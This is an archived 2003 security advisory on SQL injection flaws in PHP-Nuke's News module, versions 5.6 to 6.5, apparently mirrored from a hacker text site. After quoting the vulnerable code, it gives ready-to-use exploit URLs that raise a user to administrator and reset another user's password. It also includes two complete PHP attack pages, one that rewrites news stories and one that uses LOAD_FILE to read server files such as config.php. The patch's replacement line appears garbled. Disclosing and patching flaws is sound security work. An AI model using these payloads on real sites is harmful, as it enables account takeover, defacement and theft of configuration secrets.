Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: a6085.htm

PHP-Nuke SQL Injection



22th Mar 2003 [SBWID-6085]
COMMAND

	PHP-Nuke SQL Injection

SYSTEMS AFFECTED

	PHP-Nuke Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5

PROBLEM

	Thanks to frog-m@n [http://www.phpsecure.info] advisory :
	
	 http://www.frog-man.org/tutos/PHP-Nuke-News.txt
	
	
	 (Bogus) PHP Code/Location :
	         같같같같같같같같같
	
	/modules/News/article.php :
	
	------------------------------------------------------------------------
	
	if (stristr($REQUEST_URI,"mainfile")) {
	    Header("Location: 
	modules.php?name=$module_name&file=article&sid=$sid");
	} elseif (!isset($sid) && !isset($tid)) {
	    Header("Location: index.php");
	}
	
	
	if ($save AND is_user($user)) {
	    cookiedecode($user);
	    $db->sql_query("UPDATE ".$user_prefix."_users SET umode='$mode', 
	uorder='$order', thold='$thold' where uid='$cookie[0]'");
	    getusrinfo($user);
	    $info = 
	base64_encode("$userinfo[user_id]:$userinfo[username]:$userinfo[user_password]:$userinfo[storynum]:$userinfo[umode]:$userinfo[uorder]:$userinfo[thold]:$userinfo[noscore]");
	    setcookie("user","$info",time()+$cookieusrtime);
	}
	------------------------------------------------------------------------
	
	
	
	/modules/News/index.php :
	
	------------------------------------------------------------------------
	[...]
	function rate_article($sid, $score) {
	    global $prefix, $dbi, $ratecookie, $sitename, $r_options;
	    if ($score) {
		if ($score > 5) { $score = 5; }
		if ($score < 1) { $score = 1; }
		if (isset($ratecookie)) {
		    $rcookie = base64_decode($ratecookie);
		    $r_cookie = explode(":", $rcookie);
		}
		for ($i=0; $i < sizeof($r_cookie); $i++) {
		    if ($r_cookie[$i] == $sid) {
			$a = 1;
		    }
		}
		if ($a == 1) {
		    Header("Location: 
	modules.php?name=News&op=rate_complete&sid=$sid&rated=1");
		} else {
		    $result = sql_query("update ".$prefix."_stories set 
	score=score+$score, 
	ratings=ratings+1 where sid='$sid'", $dbi);
		    $info = base64_encode("$rcookie$sid:");
		    setcookie("ratecookie","$info",time()+3600);
		    Header("Location: 
	modules.php?name=News&op=rate_complete&sid=$sid$r_options");
		}
	    } else {
		include("header.php");
		title("$sitename: "._ARTICLERATING."");
		OpenTable();
		echo "<center>"._DIDNTRATE."<br><br>"
		    .""._GOBACK."</center>";
		CloseTable();
		include("footer.php");
	    }
	}
	
	[...]
	
	switch ($op) {
	
	[...]
	    case "rate_article":
	    rate_article($sid, $score);
	    break;
	[...]
	
	}
	
	?>
	------------------------------------------------------------------------
	
	
	
	mainfile.php :
	
	------------------------------------------------------------------
	[...]
	foreach ($_GET as $secvalue) {
	    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
		(eregi("\.\.", $secvalue)) ||
		(eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
		(eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
		(eregi("\"", $secvalue))) {
		Header("Location: index.php");
		die();
	    }
	}
	
	foreach ($_POST as $secvalue) {
	    if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
		Header("Location: index.php");
		die();
	    }
	}
	[...]
	------------------------------------------------------------------
	
	
	
	 Exploits :
	 같같같같같
	
	if magic_quotes_gpc=OFF :
	
	- Change our level (into admin) :
	
	http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
	or
	http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
	or
	http://[target]/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
	
	
	- Change the Bob's password :
	
	 http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*
	
	
	if magic_quotes_gpc=OFF AND ON !!
	
	Change the title, article,... of a news :
	
	------------------------------------------------------------------------
	<html>
	<head>
	<title>PHP-Nuke Change News</title>
	</head>
	<body>
	<?
	function ascii_phpnuke_exploit($str) {
	for ($i=0;$i < strlen($str);$i++) {
	if ($i == strlen($str)-1){
	$ascii_char.=ord(substr($str,$i));
	}else{
	$ascii_char.=ord(substr($str,$i)).',';
	}
	}
	return $ascii_char;
	}
	
	if (isset($submit)) {
	
	$score="1";
	if (isset($title)) {
	$score.=", title=char(".ascii_phpnuke_exploit($title).")";
	}
	if (strlen($hometext)>1) {
	$score.=", hometext=char(".ascii_phpnuke_exploit($hometext).")";
	}
	if (strlen($bodytext)>1){
	$score.=", bodytext=char(".ascii_phpnuke_exploit($bodytext).")";
	}
	?>
	
	<b>Target URL : </b><? echo $target; ?><br><br>
	<b>SID : </b><? echo $sid; ?><br><br>
	<b>New Title : </b><? echo $title; ?><br><br>
	<b>New Story Text : </b><? echo $hometext; ?><br><br>
	<b>New Extended Text : </b><? echo $bodytext; ?><br><br>
	
	
	<form method="POST" action="<? echo $target; ?>/modules.php">
	<input type="hidden" name="name" value="News">
	<input type="hidden" name="op" value="rate_article">
	<input type="hidden" name="sid" value="<? echo $sid; ?>">
	<input type="hidden" name="score" value="<? echo $score; ?>">
	<input type="submit" name="submit" value="Change the News">
	</form>
	<input type="submit" value="Back" onclick="history.go(-1)">
	
	<?
	}else{
	?>
	
	<form method="GET" action="<? echo $PHP_SELF; ?>">
	Target URL : <input type="text" name="target"><br>
	News SID : <input type="text" name="sid"><br><br>
	<b>New Title :</b><br> <input type="text" name="title"><br>
	<br><br><b>New Story Text :</b><br><textarea cols="50" rows="12" 
	name="hometext"></textarea>
	<br><br><br><b>New Extended Text : </b><br><textarea cols="50" 
	rows="12" 
	name="bodytext"></textarea><br><br>
	<input type="submit" name="submit" value="Preview">
	</form>
	
	<?
	}
	?>
	
	</body>
	</html>
	------------------------------------------------------------------------
	
	
	
	Save a file from the HD, like 'config.php' into a news :
	
	------------------------------------------------------------------------
	<html>
	<head>
	<title>PHP-Nuke View File</title>
	</head>
	<body>
	<?
	function ascii_phpnuke_exploit($str) {
	for ($i=0;$i < strlen($str);$i++) {
	if ($i == strlen($str)-1){
	$ascii_char.=ord(substr($str,$i));
	}else{
	$ascii_char.=ord(substr($str,$i)).',';
	}
	}
	return $ascii_char;
	}
	
	if (isset($submit)) {
	
	$score="1";
	
	if (isset($hometext)) {
	$score.=", 
	hometext=LOADFILE(char(".ascii_phpnuke_exploit($hometext)."))";
	}
	if (isset($bodytext)){
	$score.=", 
	bodytext=LOADFILE(char(".ascii_phpnuke_exploit($bodytext)."))";
	}
	?>
	
	<b>Target URL : </b><? echo $target; ?><br><br>
	<b>SID : </b><? echo $sid; ?><br><br>
	<b>File In Story Text : </b><? echo $hometext; ?><br><br>
	<b>File In Extended Text : </b><? echo $bodytext; ?><br><br>
	
	
	<form method="POST" action="<? echo $target; ?>/modules.php">
	<input type="hidden" name="name" value="News">
	<input type="hidden" name="op" value="rate_article">
	<input type="hidden" name="sid" value="<? echo $sid; ?>">
	<input type="hidden" name="score" value="<? echo $score; ?>">
	<input type="submit" name="submit" value="Change the News">
	</form>
	<input type="submit" value="Back" onclick="history.go(-1)">
	
	<?
	}else{
	?>
	
	<form method="GET" action="<? echo $PHP_SELF; ?>">
	Target URL : <input type="text" name="target"><br>
	News SID : <input type="text" name="sid"><br><br>
	<br><br><b>File In Story Text (Full Path) :</b><br><input 
	name="hometext">
	<br><br><br><b>File In Extended Text (Full Path) : </b><br><input 
	name="bodytext"><br><br>
	<input type="submit" name="submit" value="Preview">
	</form>
	
	<?
	}
	?>
	
	</body>
	</html>
	------------------------------------------------------------------------
	
	The complete file can be found, for example at :
	
	 http://[target]/modules/News/comments.php
	
	

SOLUTION

	A patch can be found on http://www.phpsecure.info
	
	
	Into mainfile.php, replace :
	
	------------------------------------------------------------------
	[...]
	foreach ($_GET as $secvalue) {
	    if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
		(eregi("\.\.", $secvalue)) ||
		(eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
		(eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
		(eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
		(eregi("\"", $secvalue))) {
		Header("Location: index.php");
		die();
	    }
	}
	
	foreach ($_POST as $secvalue) {
	    if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
		Header("Location: index.php");
		die();
	    }
	}
	[...]
	------------------------------------------------------------------
	
	
	by :
	
	
	--------------------------------------------------------------------------------------------------------------
	foreach ($_REQUEST as $key=>$value) {
	
	    if (get_magic_quotes_gpc()==0) {
	        $value = addslashes($value); // This will reproduce the option 
	magic_quotes_gpc=1
	    }
	
	    $value = 
	str_replace(array(')','=','<','>','|'),array(')','=','<','>','|'),$value);
	
	    ${$key} = $value;
	    $_REQUEST[$key] = $value;
	    if (isset($_POST[$key])) { $_POST[$key] = $value; }
	    if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
	    if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
	    if (isset($_GET[$key])) { $_GET[$key] = $value; }
	    if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; 
	}
	    if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = 
	$value; 
	}
	    if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; 
	}
	    if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
	}
	--------------------------------------------------------------------------------------------------------------
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH